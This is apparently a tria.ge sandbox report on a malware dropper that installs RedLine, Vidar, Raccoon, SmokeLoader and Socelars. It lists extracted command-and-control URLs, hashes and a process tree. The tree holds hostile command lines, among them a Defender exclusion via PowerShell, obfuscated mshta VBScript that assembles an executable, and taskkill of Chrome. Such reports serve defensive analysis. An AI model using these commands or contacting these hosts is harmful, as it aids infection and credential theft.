Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
08/10/2021, 15:07
211008-shl8xsefa9 1008/10/2021, 05:38
211008-gbvqyadce8 1007/10/2021, 18:28
211007-w4jayacge3 10Analysis
-
max time kernel
19s -
max time network
798s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
08/10/2021, 05:38
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-de-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
5.9MB
-
MD5
0308d3044eda0db671c58c2a97cb3c10
-
SHA1
1737ab616a61d35b0bde0aaad949d9894e14be9e
-
SHA256
b52242da50ea2b3a05f6787dfa7197a0c99442e91d3bc78b71363c2ff3c4f072
-
SHA512
29902fe4a53319290d18b65a6baa1d747f1389a84cd7eb1a123d05b418b737336cd54c84b76403bc2cbb1f078c19b4461a89eec8214bfcdcf4831bb1dbda0e3e
Malware Config
Extracted
vidar
41.2
916
https://mas.to/@serg4325
-
profile_id
916
Extracted
smokeloader
2020
http://gmpeople.com/upload/
http://mile48.com/upload/
http://lecanardstsornin.com/upload/
http://m3600.com/upload/
http://camasirx.com/upload/
Extracted
redline
media214
91.121.67.60:2151
Extracted
raccoon
1.8.2
3a6818b104313fce1772361ea1977d608ac93da0
-
url4cnc
http://teletop.top/kaba4ello
http://teleta.top/kaba4ello
https://t.me/kaba4ello
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
resource yara_rule behavioral2/memory/2192-237-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral2/memory/2192-238-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral2/memory/2192-239-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral2/memory/2192-240-0x000000000041B23A-mapping.dmp family_redline behavioral2/memory/2192-242-0x0000000000400000-0x0000000000422000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 3 IoCs
resource yara_rule behavioral2/files/0x0003000000013113-179.dat family_socelars behavioral2/files/0x0003000000013113-167.dat family_socelars behavioral2/files/0x0003000000013113-122.dat family_socelars -
Vidar Stealer 2 IoCs
resource yara_rule behavioral2/memory/952-207-0x0000000000400000-0x0000000002E08000-memory.dmp family_vidar behavioral2/memory/1384-329-0x00000000004A195D-mapping.dmp family_vidar -
resource yara_rule behavioral2/files/0x00030000000130e8-76.dat aspack_v212_v242 behavioral2/files/0x00030000000130e8-77.dat aspack_v212_v242 behavioral2/files/0x00030000000130e7-78.dat aspack_v212_v242 behavioral2/files/0x00030000000130e7-79.dat aspack_v212_v242 behavioral2/files/0x00030000000130ea-82.dat aspack_v212_v242 behavioral2/files/0x00030000000130ea-83.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 14 IoCs
pid Process 1204 setup_installer.exe 324 setup_install.exe 608 Thu161580bf75.exe 824 Thu166f9a8bbe80.exe 912 Thu16f584bd3686.exe 952 Thu1628aafb3efd7c3d.exe 744 Thu16466b26f8b7.exe 1692 Thu16f3de88a335950bb.exe 1164 Thu165bd34b1e1d4d81.exe 1940 Thu164ba03be19.exe 652 Thu167d514d2a7ac5a.exe 808 Thu1653d94a8da.exe 1764 Thu16f3de88a335950bb.tmp 1508 Thu16f3de88a335950bb.exe -
Loads dropped DLL 51 IoCs
pid Process 1080 setup_x86_x64_install.exe 1204 setup_installer.exe 1204 setup_installer.exe 1204 setup_installer.exe 1204 setup_installer.exe 1204 setup_installer.exe 1204 setup_installer.exe 324 setup_install.exe 324 setup_install.exe 324 setup_install.exe 324 setup_install.exe 324 setup_install.exe 324 setup_install.exe 324 setup_install.exe 324 setup_install.exe 1232 cmd.exe 1680 cmd.exe 1376 cmd.exe 1376 cmd.exe 1776 cmd.exe 824 Thu166f9a8bbe80.exe 824 Thu166f9a8bbe80.exe 1788 cmd.exe 1788 cmd.exe 564 cmd.exe 952 Thu1628aafb3efd7c3d.exe 952 Thu1628aafb3efd7c3d.exe 1620 cmd.exe 1020 cmd.exe 1020 cmd.exe 548 cmd.exe 744 Thu16466b26f8b7.exe 744 Thu16466b26f8b7.exe 1692 Thu16f3de88a335950bb.exe 1692 Thu16f3de88a335950bb.exe 1940 Thu164ba03be19.exe 1940 Thu164ba03be19.exe 652 Thu167d514d2a7ac5a.exe 652 Thu167d514d2a7ac5a.exe 588 cmd.exe 808 Thu1653d94a8da.exe 808 Thu1653d94a8da.exe 1692 Thu16f3de88a335950bb.exe 1764 Thu16f3de88a335950bb.tmp 1764 Thu16f3de88a335950bb.tmp 1764 Thu16f3de88a335950bb.tmp 1764 Thu16f3de88a335950bb.tmp 1164 Thu165bd34b1e1d4d81.exe 1164 Thu165bd34b1e1d4d81.exe 1508 Thu16f3de88a335950bb.exe 1508 Thu16f3de88a335950bb.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 11 ip-api.com 41 ipinfo.io 42 ipinfo.io -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
pid pid_target Process procid_target 3032 824 WerFault.exe 54 1332 952 WerFault.exe 41 1060 2356 WerFault.exe 107 -
Kills process with taskkill 2 IoCs
pid Process 2236 taskkill.exe 2388 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeCreateTokenPrivilege 1164 Thu165bd34b1e1d4d81.exe Token: SeAssignPrimaryTokenPrivilege 1164 Thu165bd34b1e1d4d81.exe Token: SeLockMemoryPrivilege 1164 Thu165bd34b1e1d4d81.exe Token: SeIncreaseQuotaPrivilege 1164 Thu165bd34b1e1d4d81.exe Token: SeMachineAccountPrivilege 1164 Thu165bd34b1e1d4d81.exe Token: SeTcbPrivilege 1164 Thu165bd34b1e1d4d81.exe Token: SeSecurityPrivilege 1164 Thu165bd34b1e1d4d81.exe Token: SeTakeOwnershipPrivilege 1164 Thu165bd34b1e1d4d81.exe Token: SeLoadDriverPrivilege 1164 Thu165bd34b1e1d4d81.exe Token: SeSystemProfilePrivilege 1164 Thu165bd34b1e1d4d81.exe Token: SeSystemtimePrivilege 1164 Thu165bd34b1e1d4d81.exe Token: SeProfSingleProcessPrivilege 1164 Thu165bd34b1e1d4d81.exe Token: SeIncBasePriorityPrivilege 1164 Thu165bd34b1e1d4d81.exe Token: SeCreatePagefilePrivilege 1164 Thu165bd34b1e1d4d81.exe Token: SeCreatePermanentPrivilege 1164 Thu165bd34b1e1d4d81.exe Token: SeBackupPrivilege 1164 Thu165bd34b1e1d4d81.exe Token: SeRestorePrivilege 1164 Thu165bd34b1e1d4d81.exe Token: SeShutdownPrivilege 1164 Thu165bd34b1e1d4d81.exe Token: SeDebugPrivilege 1164 Thu165bd34b1e1d4d81.exe Token: SeAuditPrivilege 1164 Thu165bd34b1e1d4d81.exe Token: SeSystemEnvironmentPrivilege 1164 Thu165bd34b1e1d4d81.exe Token: SeChangeNotifyPrivilege 1164 Thu165bd34b1e1d4d81.exe Token: SeRemoteShutdownPrivilege 1164 Thu165bd34b1e1d4d81.exe Token: SeUndockPrivilege 1164 Thu165bd34b1e1d4d81.exe Token: SeSyncAgentPrivilege 1164 Thu165bd34b1e1d4d81.exe Token: SeEnableDelegationPrivilege 1164 Thu165bd34b1e1d4d81.exe Token: SeManageVolumePrivilege 1164 Thu165bd34b1e1d4d81.exe Token: SeImpersonatePrivilege 1164 Thu165bd34b1e1d4d81.exe Token: SeCreateGlobalPrivilege 1164 Thu165bd34b1e1d4d81.exe Token: 31 1164 Thu165bd34b1e1d4d81.exe Token: 32 1164 Thu165bd34b1e1d4d81.exe Token: 33 1164 Thu165bd34b1e1d4d81.exe Token: 34 1164 Thu165bd34b1e1d4d81.exe Token: 35 1164 Thu165bd34b1e1d4d81.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1080 wrote to memory of 1204 1080 setup_x86_x64_install.exe 25 PID 1080 wrote to memory of 1204 1080 setup_x86_x64_install.exe 25 PID 1080 wrote to memory of 1204 1080 setup_x86_x64_install.exe 25 PID 1080 wrote to memory of 1204 1080 setup_x86_x64_install.exe 25 PID 1080 wrote to memory of 1204 1080 setup_x86_x64_install.exe 25 PID 1080 wrote to memory of 1204 1080 setup_x86_x64_install.exe 25 PID 1080 wrote to memory of 1204 1080 setup_x86_x64_install.exe 25 PID 1204 wrote to memory of 324 1204 setup_installer.exe 26 PID 1204 wrote to memory of 324 1204 setup_installer.exe 26 PID 1204 wrote to memory of 324 1204 setup_installer.exe 26 PID 1204 wrote to memory of 324 1204 setup_installer.exe 26 PID 1204 wrote to memory of 324 1204 setup_installer.exe 26 PID 1204 wrote to memory of 324 1204 setup_installer.exe 26 PID 1204 wrote to memory of 324 1204 setup_installer.exe 26 PID 324 wrote to memory of 1684 324 setup_install.exe 28 PID 324 wrote to memory of 1684 324 setup_install.exe 28 PID 324 wrote to memory of 1684 324 setup_install.exe 28 PID 324 wrote to memory of 1684 324 setup_install.exe 28 PID 324 wrote to memory of 1684 324 setup_install.exe 28 PID 324 wrote to memory of 1684 324 setup_install.exe 28 PID 324 wrote to memory of 1684 324 setup_install.exe 28 PID 324 wrote to memory of 1680 324 setup_install.exe 29 PID 324 wrote to memory of 1680 324 setup_install.exe 29 PID 324 wrote to memory of 1680 324 setup_install.exe 29 PID 324 wrote to memory of 1680 324 setup_install.exe 29 PID 324 wrote to memory of 1680 324 setup_install.exe 29 PID 324 wrote to memory of 1680 324 setup_install.exe 29 PID 324 wrote to memory of 1680 324 setup_install.exe 29 PID 324 wrote to memory of 1456 324 setup_install.exe 30 PID 324 wrote to memory of 1456 324 setup_install.exe 30 PID 324 wrote to memory of 1456 324 setup_install.exe 30 PID 324 wrote to memory of 1456 324 setup_install.exe 30 PID 324 wrote to memory of 1456 324 setup_install.exe 30 PID 324 wrote to memory of 1456 324 setup_install.exe 30 PID 324 wrote to memory of 1456 324 setup_install.exe 30 PID 324 wrote to memory of 1232 324 setup_install.exe 31 PID 324 wrote to memory of 1232 324 setup_install.exe 31 PID 324 wrote to memory of 1232 324 setup_install.exe 31 PID 324 wrote to memory of 1232 324 setup_install.exe 31 PID 324 wrote to memory of 1232 324 setup_install.exe 31 PID 324 wrote to memory of 1232 324 setup_install.exe 31 PID 324 wrote to memory of 1232 324 setup_install.exe 31 PID 324 wrote to memory of 1376 324 setup_install.exe 32 PID 324 wrote to memory of 1376 324 setup_install.exe 32 PID 324 wrote to memory of 1376 324 setup_install.exe 32 PID 324 wrote to memory of 1376 324 setup_install.exe 32 PID 324 wrote to memory of 1376 324 setup_install.exe 32 PID 324 wrote to memory of 1376 324 setup_install.exe 32 PID 324 wrote to memory of 1376 324 setup_install.exe 32 PID 1684 wrote to memory of 1592 1684 cmd.exe 34 PID 1684 wrote to memory of 1592 1684 cmd.exe 34 PID 1684 wrote to memory of 1592 1684 cmd.exe 34 PID 1684 wrote to memory of 1592 1684 cmd.exe 34 PID 1684 wrote to memory of 1592 1684 cmd.exe 34 PID 1684 wrote to memory of 1592 1684 cmd.exe 34 PID 1684 wrote to memory of 1592 1684 cmd.exe 34 PID 324 wrote to memory of 1620 324 setup_install.exe 33 PID 324 wrote to memory of 1620 324 setup_install.exe 33 PID 324 wrote to memory of 1620 324 setup_install.exe 33 PID 324 wrote to memory of 1620 324 setup_install.exe 33 PID 324 wrote to memory of 1620 324 setup_install.exe 33 PID 324 wrote to memory of 1620 324 setup_install.exe 33 PID 324 wrote to memory of 1620 324 setup_install.exe 33 PID 1232 wrote to memory of 608 1232 cmd.exe 55
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Users\Admin\AppData\Local\Temp\7zS4B478CB4\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS4B478CB4\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:324 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:1592
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu166f9a8bbe80.exe4⤵
- Loads dropped DLL
PID:1680 -
C:\Users\Admin\AppData\Local\Temp\7zS4B478CB4\Thu166f9a8bbe80.exeThu166f9a8bbe80.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:824 -
C:\Users\Admin\Pictures\Adobe Films\UvUblJGVbsqRnCfvoQYDpOw8.exe"C:\Users\Admin\Pictures\Adobe Films\UvUblJGVbsqRnCfvoQYDpOw8.exe"6⤵PID:2556
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 824 -s 15166⤵
- Program crash
PID:3032
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16205451b994.exe /mixone4⤵PID:1456
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu161580bf75.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1232 -
C:\Users\Admin\AppData\Local\Temp\7zS4B478CB4\Thu161580bf75.exeThu161580bf75.exe5⤵
- Executes dropped EXE
PID:608 -
C:\Users\Admin\AppData\Roaming\3659841.scr"C:\Users\Admin\AppData\Roaming\3659841.scr" /S6⤵PID:2820
-
-
C:\Users\Admin\AppData\Roaming\6737665.scr"C:\Users\Admin\AppData\Roaming\6737665.scr" /S6⤵PID:2852
-
-
C:\Users\Admin\AppData\Roaming\7721938.scr"C:\Users\Admin\AppData\Roaming\7721938.scr" /S6⤵PID:3040
-
-
C:\Users\Admin\AppData\Roaming\6394260.scr"C:\Users\Admin\AppData\Roaming\6394260.scr" /S6⤵PID:2220
-
-
C:\Users\Admin\AppData\Roaming\5764223.scr"C:\Users\Admin\AppData\Roaming\5764223.scr" /S6⤵PID:1556
-
C:\Users\Admin\AppData\Roaming\5764223.scr"C:\Users\Admin\AppData\Roaming\5764223.scr"7⤵PID:2356
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2356 -s 5248⤵
- Program crash
PID:1060
-
-
-
-
C:\Users\Admin\AppData\Roaming\7087959.scr"C:\Users\Admin\AppData\Roaming\7087959.scr" /S6⤵PID:1104
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1628aafb3efd7c3d.exe4⤵
- Loads dropped DLL
PID:1376 -
C:\Users\Admin\AppData\Local\Temp\7zS4B478CB4\Thu1628aafb3efd7c3d.exeThu1628aafb3efd7c3d.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:952 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 952 -s 9806⤵
- Program crash
PID:1332
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu165bd34b1e1d4d81.exe4⤵
- Loads dropped DLL
PID:1620 -
C:\Users\Admin\AppData\Local\Temp\7zS4B478CB4\Thu165bd34b1e1d4d81.exeThu165bd34b1e1d4d81.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1164 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:1700
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:2388
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16466b26f8b7.exe4⤵
- Loads dropped DLL
PID:1788 -
C:\Users\Admin\AppData\Local\Temp\7zS4B478CB4\Thu16466b26f8b7.exeThu16466b26f8b7.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:744
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16f584bd3686.exe4⤵
- Loads dropped DLL
PID:1776 -
C:\Users\Admin\AppData\Local\Temp\7zS4B478CB4\Thu16f584bd3686.exeThu16f584bd3686.exe5⤵
- Executes dropped EXE
PID:912
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16f3de88a335950bb.exe4⤵
- Loads dropped DLL
PID:564 -
C:\Users\Admin\AppData\Local\Temp\7zS4B478CB4\Thu16f3de88a335950bb.exeThu16f3de88a335950bb.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1692 -
C:\Users\Admin\AppData\Local\Temp\is-GOMG7.tmp\Thu16f3de88a335950bb.tmp"C:\Users\Admin\AppData\Local\Temp\is-GOMG7.tmp\Thu16f3de88a335950bb.tmp" /SL5="$4012E,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zS4B478CB4\Thu16f3de88a335950bb.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1764 -
C:\Users\Admin\AppData\Local\Temp\7zS4B478CB4\Thu16f3de88a335950bb.exe"C:\Users\Admin\AppData\Local\Temp\7zS4B478CB4\Thu16f3de88a335950bb.exe" /SILENT7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1508 -
C:\Users\Admin\AppData\Local\Temp\is-VEVSJ.tmp\Thu16f3de88a335950bb.tmp"C:\Users\Admin\AppData\Local\Temp\is-VEVSJ.tmp\Thu16f3de88a335950bb.tmp" /SL5="$5012E,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zS4B478CB4\Thu16f3de88a335950bb.exe" /SILENT8⤵PID:1488
-
C:\Users\Admin\AppData\Local\Temp\is-99JO1.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-99JO1.tmp\postback.exe" ss19⤵PID:2244
-
-
C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe"C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss19⤵PID:2280
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://dateadult-contacts.com/?u=h2dp605&o=lxw09vh10⤵PID:2156
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2156 CREDAT:275457 /prefetch:211⤵PID:2740
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2156 CREDAT:275475 /prefetch:211⤵PID:2324
-
-
-
-
C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe"C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart9⤵PID:2360
-
C:\88fc31e04a0072fd3b\Setup.exeC:\88fc31e04a0072fd3b\\Setup.exe /q /norestart /x86 /x64 /web10⤵PID:2476
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu164ba03be19.exe4⤵
- Loads dropped DLL
PID:1020 -
C:\Users\Admin\AppData\Local\Temp\7zS4B478CB4\Thu164ba03be19.exeThu164ba03be19.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1940 -
C:\Users\Admin\AppData\Local\Temp\7zS4B478CB4\Thu164ba03be19.exeC:\Users\Admin\AppData\Local\Temp\7zS4B478CB4\Thu164ba03be19.exe6⤵PID:2192
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1653d94a8da.exe4⤵
- Loads dropped DLL
PID:588 -
C:\Users\Admin\AppData\Local\Temp\7zS4B478CB4\Thu1653d94a8da.exeThu1653d94a8da.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:808 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS4B478CB4\Thu1653d94a8da.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS4B478CB4\Thu1653d94a8da.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )6⤵PID:1304
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS4B478CB4\Thu1653d94a8da.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS4B478CB4\Thu1653d94a8da.exe") do taskkill /F -Im "%~NxU"7⤵PID:2180
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Thu1653d94a8da.exe"8⤵
- Kills process with taskkill
PID:2236
-
-
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew8⤵PID:2224
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )9⤵PID:2332
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"10⤵PID:2688
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )9⤵PID:532
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I10⤵PID:2712
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "11⤵PID:2236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"11⤵PID:2760
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu167d514d2a7ac5a.exe4⤵
- Loads dropped DLL
PID:548 -
C:\Users\Admin\AppData\Local\Temp\7zS4B478CB4\Thu167d514d2a7ac5a.exeThu167d514d2a7ac5a.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:652
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\9BB3.exeC:\Users\Admin\AppData\Local\Temp\9BB3.exe1⤵PID:2320
-
C:\Users\Admin\AppData\Local\Temp\CCccleaner.exe"C:\Users\Admin\AppData\Local\Temp\CCccleaner.exe"2⤵PID:2544
-
C:\Users\Admin\AppData\Local\Temp\CCccleaner.exeC:\Users\Admin\AppData\Local\Temp\CCccleaner.exe3⤵PID:1844
-
-
C:\Users\Admin\AppData\Local\Temp\CCccleaner.exeC:\Users\Admin\AppData\Local\Temp\CCccleaner.exe3⤵PID:1384
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {7A821E43-AA3C-4A87-8AC0-69FB25126432} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]1⤵PID:2724
-
C:\Users\Admin\AppData\Roaming\dgwtijdC:\Users\Admin\AppData\Roaming\dgwtijd2⤵PID:2216
-
-
C:\Users\Admin\AppData\Local\Temp\6E5.exeC:\Users\Admin\AppData\Local\Temp\6E5.exe1⤵PID:1280
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵PID:2100
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\olcb2ddq\olcb2ddq.cmdline"3⤵PID:2508
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES73F8.tmp" "c:\Users\Admin\AppData\Local\Temp\olcb2ddq\CSCA7025051E8394E289A95B335A16067.TMP"4⤵PID:1980
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {C1FC48E6-E19F-4F15-9649-439CFF8DF276} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]1⤵PID:1340
-
C:\Users\Admin\AppData\Roaming\dgwtijdC:\Users\Admin\AppData\Roaming\dgwtijd2⤵PID:2000
-